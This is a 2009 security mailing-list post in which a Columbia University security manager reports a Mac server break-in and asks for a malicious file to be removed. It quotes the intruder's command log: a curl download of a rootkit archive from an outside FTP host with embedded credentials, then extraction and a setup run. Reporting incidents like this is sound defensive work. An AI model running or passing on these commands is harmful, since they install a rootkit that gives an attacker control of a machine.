[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135 - ASN 26347
Joel Rosenblatt
joel at columbia.edu
Mon Mar 30 14:00:45 EDT 2009
Hi,
We had a break-in of a Mac server (bad root password .. duh) - upon going through the log of commands run, we came across:
curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
tar xzf kit5.tar
ls -a
cd shv5
./setup abelha 54
It appears to be a Mac root kit.
AS | IP | AS Name
26347 | 208.113.230.135 | DREAMHOST-AS - New Dream Network, LLC
I wonder if it could be removed.
Thanks,
Joel Rosenblatt
Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office (CISO)
Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
http://www.columbia.edu/~joel